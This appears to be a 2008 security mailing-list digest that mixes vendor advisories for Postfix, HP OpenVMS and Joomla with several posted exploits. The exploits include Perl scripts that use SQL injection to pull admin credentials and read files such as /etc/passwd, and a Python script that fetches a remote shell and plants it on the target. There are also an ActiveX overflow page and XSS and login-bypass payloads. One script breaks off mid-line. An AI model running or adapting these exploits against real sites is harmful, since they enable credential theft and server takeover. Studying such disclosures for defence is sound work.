[USN-642-1] Postfix vulnerabilities

2008-09-11 Thread Kees Cook
=== 
Ubuntu Security Notice USN-642-1 September 10, 2008
postfix vulnerabilities
CVE-2008-3889
===

A security issue affects the following Ubuntu releases:

Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  postfix 2.4.5-3ubuntu1.3

Ubuntu 8.04 LTS:
  postfix 2.5.1-2ubuntu1.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

Wietse Venema discovered that Postfix leaked internal file descriptors
when executing non-Postfix commands.  A local attacker could exploit
this to cause Postfix to run out of descriptors, leading to a denial
of service.


Updated packages for Ubuntu 7.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix_2.4.5-3ubuntu1.3.diff.gz
  Size/MD5:   208955 3596c996c2d82fcc9cd755c337cbac6b

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix_2.4.5-3ubuntu1.3.dsc
  Size/MD5: 1034 7097cb52b993eb39e3572516e37fa2fa

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix_2.4.5.orig.tar.gz
  Size/MD5:  2934634 ceba0cde05d12baa0ba2ed69fbb96b42

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-dev_2.4.5-3ubuntu1.3_all.deb
  Size/MD5:   131564 d817f30dac7e3cefa7207c9545484234

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-doc_2.4.5-3ubuntu1.3_all.deb
  Size/MD5:   805972 f21663666d6a5a9d4fc82842a22f72ab

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-cdb_2.4.5-3ubuntu1.3_amd64.deb
  Size/MD5:    38160 2b8a37d554c58a28e23d10d86df219a9

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-ldap_2.4.5-3ubuntu1.3_amd64.deb
  Size/MD5:    45310 900f1c0404391ecf79c1275175ef643d

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-mysql_2.4.5-3ubuntu1.3_amd64.deb
  Size/MD5:    40108 a1a6ffbfb86958511d610025e0a73d58

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-pcre_2.4.5-3ubuntu1.3_amd64.deb
  Size/MD5:    40160 a8775f56b0b51d99565ccbe731dc5e94

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-pgsql_2.4.5-3ubuntu1.3_amd64.deb
  Size/MD5:    40224 b989f80156a941d822b1e7d19477e08a

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix_2.4.5-3ubuntu1.3_amd64.deb
  Size/MD5:  1188180 9850d0763881c36da658d051fd43bcc5

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-cdb_2.4.5-3ubuntu1.3_i386.deb
  Size/MD5:    37940 5cfcf1cf801d60e309428d6770e31e48

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-ldap_2.4.5-3ubuntu1.3_i386.deb
  Size/MD5:    44644 0911f3527974816a8101e579ed439e7b

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-mysql_2.4.5-3ubuntu1.3_i386.deb
  Size/MD5:    39790 10b6ae3688a3b74e208ba383973bd3a8

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-pcre_2.4.5-3ubuntu1.3_i386.deb
  Size/MD5:    39634 df5c552d2f10bfcdff5e9e38b2ce946a

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-pgsql_2.4.5-3ubuntu1.3_i386.deb
  Size/MD5:    39876 938516395dfcadfb33c7becb673cc157

http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix_2.4.5-3ubuntu1.3_i386.deb
  Size/MD5:  1118910 8479b2542dd638e9bc78ee318ba320a2

  lpia architecture (Low Power Intel Architecture):


http://ports.ubuntu.com/pool/main/p/postfix/postfix-cdb_2.4.5-3ubuntu1.3_lpia.deb
  Size/MD5:    37918 c792b13b095b27f4c44f00b6ae7c5d4b

http://ports.ubuntu.com/pool/main/p/postfix/postfix-ldap_2.4.5-3ubuntu1.3_lpia.deb
  Size/MD5:    44384 83e6e216238d4d3d6f4e1855767f3d40

http://ports.ubuntu.com/pool/main/p/postfix/postfix-mysql_2.4.5-3ubuntu1.3_lpia.deb
  Size/MD5:    39810 0a917ce72b8bc23490af6d2374ebfd84

http://ports.ubuntu.com/pool/main/p/postfix/postfix-pcre_2.4.5-3ubuntu1.3_lpia.deb
  Size/MD5:    39534 5c3c470f3609e053d212b96961bad854

http://ports.ubuntu.com/pool/main/p/postfix/postfix-pgsql_2.4.5-3ubuntu1.3_lpia.deb
  Size/MD5:    39872 f8a381828c5e4e8056aad583282b2e70

http://ports.ubuntu.com/pool/main/p/postfix/postfix_2.4.5-3ubuntu1.3_lpia.deb
  Size/MD5:  1109740 56a17d3a010a3e2ea1be39e9ffb9ae3a

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix-cdb_2.4.5-3ubuntu1.3_powerpc.deb
  Size/MD5:    40328 7574b4b3c594be170675c25b25cf7ddd


Ezphotogallery 2.1 Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File Disclosure)

2008-09-11 Thread irancrash
#!/usr/bin/perl
#
#
#Script : Ezphotogallery 2.1
#
#Type : Multiple Vulnerabilities ( Xss/Login Bypass/Sql injection Exploit/File Disclosure)
#
#Method : GET
#
#Alert : High
#
#Google Dork : 100% | 50% | 25% Back to gallery inurl:show.php?imageid=
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download : http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip
#
#
#Xss Vulnerabilities :
#
#Xss 1 : gallery.php?galleryid=<script>alert(document.cookie)</script>
#Xss 2 : show.php?imageid=156&size=''?''<script>alert(document.cookie)</script>
#Xss 3 : show.php?imageid=<script>alert(document.cookie)</script>
#
#
#Login Bypass :
#
#Insert in gallery.php
#
#User : admin ' or ' 1=1
#Password : Dr.Crash
#
#
#Sql Injection :
#
#Injection 1 : show.php?imageid=sql
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#

use LWP;
use HTTP::Request;
use Getopt::Long;


$scriptname = "Ezphotogallery 2.1";

sub header
{
print "
* $scriptname

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
";
}

sub usage
{
  print "
* Usage : perl $0 http://Example/

";
}


$url = ($ARGV[0]);

if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
sub xpl1()
{
#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)
$vul = "/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),4,5,6,7,8,9+from+users/*";
$requestpage = $url.$vul;


my $req  = HTTP::Request->new(POST => $requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
# $contlen and $poststring are never assigned in the original script, so the
# request goes out with an empty body; the injection is carried in the URL.
$req->header("content-length" => $contlen);
$req->content($poststring);

$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();

# The hex constants in the query decode to the markers "Login:" / "<enduser>"
# and "\r\nPassword:" / "<endpass>", which is what the values are cut out on.
@name = split(/Login:/,$content);
$name = $name[1];
@name = split(/enduser/,$name);
$name = $name[0];

@password = split(/Password:/,$content);
$password = $password[1];
@password = split(/endpass/,$password);
$password = $password[0];

if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}

print "\n Username: ".$name."\n\n";
print " Password:  ".$password."\n\n";


}


#XPL2

sub xpl2()
{
print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd";
print "\n Enter File Address :";
$fil3 = <STDIN>;
chomp($fil3);

$vul = "/show.php?imageid=999+union+select+0,1,2,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),4,5,6,7,8,9+from+users/*";
$requestpage = $url.$vul;

my $req  = HTTP::Request->new(POST => $requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);

$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();


@name = split(/Login:/,$content);
$name = $name[1];
@name = split(/enduser/,$name);
$name = $name[0];


# $password is only set by xpl1, so in mode 2 this reduces to a check on $name.
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}

open (FILE, ">source.txt");
print FILE $name;
close (FILE);
print " File Save In source.txt\n";

}

#XPL2 END
#Starting;
print 

* $scriptname

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *

* Mod Options :*
* Mod 1 : 

sqlvdir.dll ActiveX Remote Buffer Overflow Exploit

2008-09-11 Thread beenudel1986
#  est.2007\/\/   forum.darkc0de.com   # 
 
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - r4s4al# 
#  ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE# 
#   and all darkc0de members---# 
 
# 
# Author: Beenu Arora 
# 
# Home  : www.BeenuArora.com 
# 
# Email : [EMAIL PROTECTED] 
# 
# Share the c0de! 
# 
 
# 
# sqlvdir.dll ActiveX Remote Buffer Overflow Exploit 
# 
# Successfull exploitation crashes the Browser 
# 
# Tested On : WinXp Sp-2 IE 6.0 
# 
# 
# Loaded File: C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll 
# Class SQLVDirControl 
# GUID: {FC13BAA2-9C1A-4069-A221-31A147636038} 
# Number of Interfaces: 1 
# Default Interface: ISQLVDirControl 
# RegKey Safe for Script: False 
# RegkeySafe for Init: False 
# KillBitSet: False 
# 
 
 
<html>
Test Exploit page
<object classid='clsid:FC13BAA2-9C1A-4069-A221-31A147636038' id='target'></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll"
prototype  = "Sub Connect ( [ ByVal szServer As Variant ] ,  [ ByVal szWebSite As Variant ] )"
memberName = "Connect"
progid     = "SQLVDIRLib.SQLVDirControl"
argCount   = 2
arg1="defaultV"
arg2=http://[EMAIL PROTECTED] 
st\tes\t\:#$%test\test\test\te?s\test\test\tes\\:[EMAIL PROTECTED] 
\test\tes\test\test\tes\t\:#$%test\test\test\te?s\test\test\tes\\:[EMAIL
 PROTECTED] 
t\te.s\ttest\test\test\tes\test\test\tes\t\:#$%test\test\test\te?s\test\test\tes\\:[EMAIL
 PROTECTED] 
test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\ 
 
target.Connect arg1 ,arg2

</script>
</html>


PhsBlog v0.2 Bypass Sql injection Filtering Exploit

2008-09-11 Thread irancrash
#!/usr/bin/perl
#
#
#Script : PhsBlog v0.2
#
#Type : Bypass Sql injection Filtering Exploit
#
#Method : GET
#
#Risk : High
#
#
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#
#
#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
#
#
#
#Script Download :  http://www.phsdev.com/downloads/phsblog_current.zip
#
#
#
#Tnx : God
#
# HTTP://IRCRASH.COM
#
#

use LWP;
use HTTP::Request;
use Getopt::Long;


$scriptname = "PhsBlog v0.2";

sub header
{
print "
* $scriptname

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *
";
}

sub usage
{
  print "
* Usage : perl $0 http://Example/

";
}


$url = ($ARGV[0]);

if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
sub xpl1()
{
#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)
$vul = "/index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12+from+phsblog_users/*";
$requestpage = $url.$vul;


my $req  = HTTP::Request->new(POST => $requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
# $contlen and $poststring are never assigned in the original script, so the
# request goes out with an empty body; the injection is carried in the URL.
$req->header("content-length" => $contlen);
$req->content($poststring);

$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();

# The hex constants in the query decode to the markers "Login:" / "<enduser>"
# and "\r\nPassword:" / "<endpass>", which is what the values are cut out on.
@name = split(/Login:/,$content);
$name = $name[1];
@name = split(/enduser/,$name);
$name = $name[0];

@password = split(/Password:/,$content);
$password = $password[1];
@password = split(/endpass/,$password);
$password = $password[0];

if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}

print "\n Username: ".$name."\n\n";
print " Password:  ".$password."\n\n";


}


#XPL2

sub xpl2()
{
print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd";
print "\n Enter File Address :";
$fil3 = <STDIN>;
chomp($fil3);
#index.php?sql_cid=999'union+select+0,1,2,3,4,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),6,7,8,9,10,11,12+from+phsblog_users/*
$vul = "?show=pickup&sid=9'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*";
$requestpage = $url.$vul;

my $req  = HTTP::Request->new(POST => $requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);

$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();


@name = split(/Login:/,$content);
$name = $name[1];
@name = split(/enduser/,$name);
$name = $name[0];


# $password is only set by xpl1, so in mode 2 this reduces to a check on $name.
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}

open (FILE, ">source.txt");
print FILE $name;
close (FILE);
print " File Save In source.txt\n";

}

#XPL2 END
#Starting;
print "
* $scriptname

*Discovered by : Khashayar Fereidani   *
*Exploited by : Khashayar Fereidani*
*My Official Website : http://fereidani.ir *

* Mod Options :*
* Mod 1 : Find Script username and password*
* Mod 2 : File Disclosure(not work in many servers)*
";
print "\n \n Enter Mod : ";
$mod = <STDIN>;
chomp($mod);
if ($mod==1 or $mod==2) { print "\n Exploiting .. \n"; } else { print "\n Unknown Mod ! \n Exploit Failed !"; };
if ($mod==1) { xpl1(); };
if ($mod==2) { xpl2(); };


minb Remote Code Execution Exploit

2008-09-11 Thread r3d . w0rm
#!/usr/bin/python
#
#   minb Remote Code Execution Exploit
#
#   AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#   Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
#   Our Site : Http://IRCRASH.COM
#   IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)
#
#   Site : http://minb.sf.net
#   Download : http://switch.dl.sourceforge.net/sourceforge/minb/minb-0.1.0.tar.bz2
#   DORK : Powered by minb
#
#   [Note]
#   All php file in this cms have this bug ;)
#
#   Site : Http://IRCRASH.COM
#
#   TNX GOD
#

# Python 2 script (print statement, urllib.urlopen)
import sys, urllib

if len(sys.argv) < 3:
    print "minb Remote code Execution Exploit"
    print "Powered by : R3d.W0rm"
    print "www.IrCrash.com"
    print "Usage : " + sys.argv[0] + " http://Target/path http://evil/shell.txt"
    print "Ex. " + sys.argv[0] + " http://site.com/minb http://r3d.a20.ir/r.txt"
    exit()

if 'http://' not in sys.argv[1]:
    sys.argv[1] = 'http://' + sys.argv[1]

if 'http://' not in sys.argv[2]:
    sys.argv[2] = 'http://' + sys.argv[2]

fp = '/include/modules/top/1-random_quote.php?parse=r3d.w0rm'

data = urllib.urlencode({'quotes_to_edit': 'quotes_to_edit=;$s=fopen(\'' + sys.argv[2] + '\',r);while(!feof($s)){$shell.=fread($s,1024);};fclose($s);$fp=fopen(\'../../../upload/pictures/r3d.w0rm.php\',\'w+\');fwrite($fp,$shell);fclose($fp);/*'})

urllib.urlopen(sys.argv[1] + fp, data)

urllib.urlopen(sys.argv[1] + fp)

test = urllib.urlopen(sys.argv[1] + '/upload/pictures/r3d.w0rm.php').read()

if 'Not Found' not in test:
    print "Shell Uploaded ."
    print sys.argv[1] + '/upload/pictures/r3d.w0rm.php'

exit()



[security bulletin] HPSBOV02364 SSRT080078 rev.1 - HP OpenVMS SMGRTL Run Time Library, Local Authorized User, Gain Privileged Access

2008-09-11 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01539423
Version: 1

HPSBOV02364 SSRT080078 rev.1 - HP OpenVMS SMGRTL Run Time Library, Local 
Authorized User, Gain Privileged Access

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2008-09-10
Last Updated: 2008-09-10

Potential Security Impact: Local authorized user, gain privileged access

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP OpenVMS SMGRTL 
Run Time Library. The vulnerability could be exploited locally by an authorized 
user to gain extended privileges. 

References: CVE-2008-3540

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
The SMGRTL Run Time Library provided with the following HP OpenVMS versions:

HP OpenVMS for Integrity Servers v 8.3-1H1 
HP OpenVMS for Integrity Servers v 8.3 
HP OpenVMS for Integrity Servers v 8.2-1 
HP OpenVMS ALPHA v 8.3 
HP OpenVMS ALPHA v 8.2 
HP OpenVMS ALPHA v 7.3-2 



BACKGROUND

CVSS 2.0 Base Metrics 
===
Reference Base Vector   Base Score 
CVE-2008-3540 (AV:L/AC:L/Au:S/C:P/I:P/A:P)  4.3
===
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

The Hewlett-Packard Company thanks [EMAIL PROTECTED] for reporting this 
vulnerability to [EMAIL PROTECTED]

RESOLUTION

HP is providing the following early release patches publicly for use by any 
customer until updates are available in mainstream release patch kits. 

HP OpenVMS for Integrity Servers v 8.3-1H1 ECO VMS831H1I_MUP-SMGRTL-V0100
 
ECO Kit: 
ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.3-1H1/VMS831H1I_SMGRTL_MUP-V0100.ZIPEXE
 
ECO Notes: 
ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.3-1H1/VMS831H1I_SMGRTL_MUP-V0100.txt
 
 


HP OpenVMS for Integrity Servers v 8.3 ECO VMS83I_SMGRTL_MUP-V0100
 
ECO Kit: 
ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.3/VMS83I_SMGRTL_MUP-V0100.ZIPEXE 
ECO Notes: 
ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.3/VMS83I_SMGRTL_MUP-V0100.txt 
 


HP OpenVMS for Integrity Servers v 8.2-1 ECO VMS821I_SMGRTL_MUP-V0100 
 
ECO Kit: 
ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.2-1/VMS821I_SMGRTL_MUP-V0100.ZIPEXE
 
ECO Notes: 
ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.2-1/VMS821I_SMGRTL_MUP-V0100.txt 
 


HP OpenVMS for Integrity Servers v 8.3 ECO VMS83I_SMGRTL_MUP-V0100
 
ECO Kit: 
ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.3/VMS83I_SMGRTL_MUP-V0100.ZIPEXE 
ECO Notes: 
ftp://ftp.itrc.hp.com/openvms_patches/i64/V8.3/VMS83I_SMGRTL_MUP-V0100.txt 
 


HP OpenVMS ALPHA v 8.3 ECO VMS83A_SMGRTL_MUP-V0100
 
ECO Kit: 
ftp://ftp.itrc.hp.com/openvms_patches/alpha/V8.3/VMS83A_SMGRTL_MUP-V0100.ZIPEXE 
ECO Notes: 
ftp://ftp.itrc.hp.com/openvms_patches/alpha/V8.3/VMS83A_SMGRTL_MUP-V0100.txt 
 


HP OpenVMS ALPHA v 8.2 ECO VMS82A_SMGRTL_MUP-V0100
 
ECO Kit: 
ftp://ftp.itrc.hp.com/openvms_patches/alpha/V8.2/VMS82A_SMGRTL_MUP-V0100.ZIPEXE 
ECO Notes: 
ftp://ftp.itrc.hp.com/openvms_patches/alpha/V8.2/VMS82A_SMGRTL_MUP-V0100.txt 
 


HP OpenVMS ALPHA v 7.3-2 ECO VMS732_SMGRTL_MUP-V0100
 
ECO Kit: 
ftp://ftp.itrc.hp.com/openvms_patches/alpha/V7.3-2/VMS732_SMGRTL_MUP-V0100.ZIPEXE
 
ECO Notes: 
ftp://ftp.itrc.hp.com/openvms_patches/alpha/V7.3-2/VMS732_SMGRTL_MUP-V0100.txt 
 


PRODUCT SPECIFIC INFORMATION 
None

HISTORY 
Version:1 (rev.1) - 10 September 2008 Initial release 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: [EMAIL PROTECTED] 
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED] 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC
 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.


To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is 

Nooms 1.1

2008-09-11 Thread irancrash


Script : Nooms 1.1

Type : Multiple Vulnerabilities (Cross Site Scripting/Redirect/Mysql Brute Force Local Access)

Risk : Medium



Download From : http://surfnet.dl.sourceforge.net/sourceforge/nooms/nooms_1.1.zip



Discovered by : Khashayar Fereidani Or Dr.Crash

My Website : HTTP://FEREIDANI.IR

Team Website : Http://IRCRASH.COM

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com



Mysql Remote Brute Force Vulnerability :


This is a new type of vulnerability.

I can't publish an exploit for this vulnerability,
but with it an attacker can brute force the root and other user
passwords with PHP remotely.

Mysql Brute Force Vulnerability :
/db.php?g_dbhost=localhost&g_dbuser=[username]&g_dbpwd=[password]



Cross Site Scripting Vulnerabilities :

Xss 1 : http://Example/smileys.php?page_id=<script>alert('xss')</script>

Xss 2 : http://Example/search.php?q=";<script>alert('xss')</script>



Redirect Vulnerability :

Xss 1 : http://Example/admin/auth.php?g_site_url=[URL]



Tnx : God

  HTTP://IRCRASH.COM HTTP://FEREIDANI.IR




Advisory 04/2008: Joomla Weak Random Password Reset Token Vulnerability

2008-09-11 Thread Stefan Esser
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


  SektionEins GmbH
 www.sektioneins.de

  -= Security  Advisory =-


 Advisory: Joomla Weak Random Password Reset Token Vulnerability
 Release Date: 2008/09/11
Last Modified: 2008/09/11
   Author: Stefan Esser [stefan.esser[at]sektioneins.de]

  Application: Joomla <= 1.5.7
 Severity: Usage of mt_rand() and mt_srand() for generation
   of cryptographic secrets like random password 
   reset tokens
 Risk: High
Vendor Status: Vendor has released a partially fixed Joomla 1.5.7
Reference: http://www.sektioneins.de/advisories/SE-2008-04.txt
   
http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/


Overview:

   Quote from http://www.joomla.org
   "Joomla is an award-winning content management system (CMS), which
   enables you to build Web sites and powerful online applications.
   Many aspects, including its ease-of-use and extensibility, have
   made Joomla the most popular Web site software available."

   During an analysis of the password reset vulnerability fixed in
   Joomla 1.5.6 we realized that Joomla does not only generate random
   password reset tokens with mt_rand(), which is not secure enough 
   for cryptographic secrets anyway, but additionally initializes the
   PRNG with a weak seed that results in less than 1.000.000 possible
   password reset tokens.

   Because there are only 1.000.000 possible password reset tokens an
   attacker can trigger a reset of the admin password and then try out
   all possible password reset tokens until he finds the correct one.
   Even with a home DSL line (as used in Germany) breaking into the
   admin account should be possible in less than 3 hours. However,
   attackers are usually bouncing over much faster hosts.

   In response to our report Joomla 1.5.7 was released (without sharing
   the patch with us prior to the release) which replaces the very weak PRNG
   seeding with a new seed that is about 2^32 in strength. While this
   stops the simple brute forcing attack, Joomla's password reset token
   is still vulnerable to mt_rand() leak attacks, and because Joomla still
   seeds the PRNG with mt_srand() it is a potential threat to other PHP
   applications or plugins using mt_rand() on the same server.


Details:

   The problems arising from using mt_(s)rand for cryptographic secrets
   and possible attacks against PHP's PRNG and PHP applications using it
   are explained by the blog post "mt_(s)rand and not so random numbers",
   which is available here:

   http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/


Proof of Concept:

   SektionEins GmbH is not going to release a proof of concept 
   exploit for this vulnerability.


Disclosure Timeline:

   15. Aug 2008 - Sent notification to Joomla about the vulnerability
   20. Aug 2008 - Resent notification because no reply from Joomla
   20. Aug 2008 - Received confirmation
   21. Aug 2008 - Received a forwarded message from vendor-sec discussing
  the vulnerability - obviously Joomla shared our report
  with vendor-sec without asking or notifying us.
   21. Aug 2008 - In a reply to the forwarded message we recommended NOT
  TO USE mt_srand for the password reset
   03. Sep 2008 - On Joomla.org appears a blog post notifying their users
  that they should upgrade to Joomla 1.5.6 immediately
  because of security issues with the password reset
   09. Sep 2008 - The Joomla Development Team releases Joomla 1.5.7
  without telling us about this or consulting us to review
  their patch
   11. Sep 2008 - Public Disclosure after learning about the new
  Joomla 1.5.7 in the media


Recommendation:

   It is recommended to upgrade not only to the latest version of Joomla,
   which also fixes additional vulnerabilities reported by third parties,
   but also to install the Suhosin PHP extension, which comes with a
   generic protection against mt_(s)rand vulnerabilities.

   Upgrading only Joomla does not fix the whole problem.
   
   Grab your copies at:
   
   http://www.joomla.org
   http://www.suhosin.org


CVE Information:

   The Common Vulnerabilities and Exposures project (cve.mitre.org) has
   not assigned a name to this vulnerability yet.


GPG-Key:

   pub  1024D/15ABDA78 2004-10-17 Stefan Esser [EMAIL PROTECTED]
   Key fingerprint = 7806 58C8 CFA8 CE4A 1C2C  57DD 4AE1 795E 15AB DA78


Copyright 2008 SektionEins GmbH. All rights reserved.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.8 (Darwin)

iEYEARECAAYFAkjJLHkACgkQSuF5XhWr2njUYQCgq+5P1O+7llh32KXcCHqdQ/C4
QWoAoJGF6jt3rDyNM3ESDlfUA/NxW3f9
=AA3y
-END PGP SIGNATURE-



RE: SQL Smuggling

2008-09-11 Thread Gary Oleary-Steele
Hi,

First let me start by saying I'm not writing to flame anyone (or whatever you
kids say these days). I know it can be daunting to release a paper to the
security community, because if any of it is incorrect you're gonna hear about it.

However, releasing a paper and claiming it to be a new class (or sub-class) of
vulnerability, well, I'm sorry, it's like wearing gold football boots: you had
better get it right after a statement like that.

If this paper was titled "Bypassing Broken Input Validation Filters" then there
would be no problems. However, none of what exists in this document is new; in
fact most of it is in the Web Application Hacker's Handbook or in much older
papers. Constructing attacks of all kinds to bypass blacklist filters is a
common duty of the web application tester; also take a look at all of the
recent SQL injection worms.

The main thing wrong here is claiming it to be something new, or even claiming
it to be a sub-class. It's not!

It's several methods for encoding SQL queries or tricking multi-layered input
validation/sanitisation routines, none of which are new, all of which are
implemented by every pen/app tester I have ever worked with.

It could be a useful reference but I would rename it and drop the "new class"
claims.

Regards
Gary

P.S. You mention the Unicode trick but don't provide any code or exploit
examples. Here is a Ruby script to perform the encoding when attacking a bug
via IIS (others may also work).


# Ruby Script to generate URL encoded Unicode UTF-8 URL.
# Author: Gary O'leary-Steele of Sec-1 Ltd
# Example:
# The string ' or 1 in (@@version)-- is encoded as (and works for the same SQL
# injection attack)
# %u02b9%u0020%uff4f%uff52%u0020%uff11%u0020%uff49%uff4e%u0020%uff08%u0040%u0040%uff56%uff45%uff52%uff53%uff49%uff4f%uff4e%uff09%uff0d%uff0d
#
#

require 'uri'

def unicode_url(string)
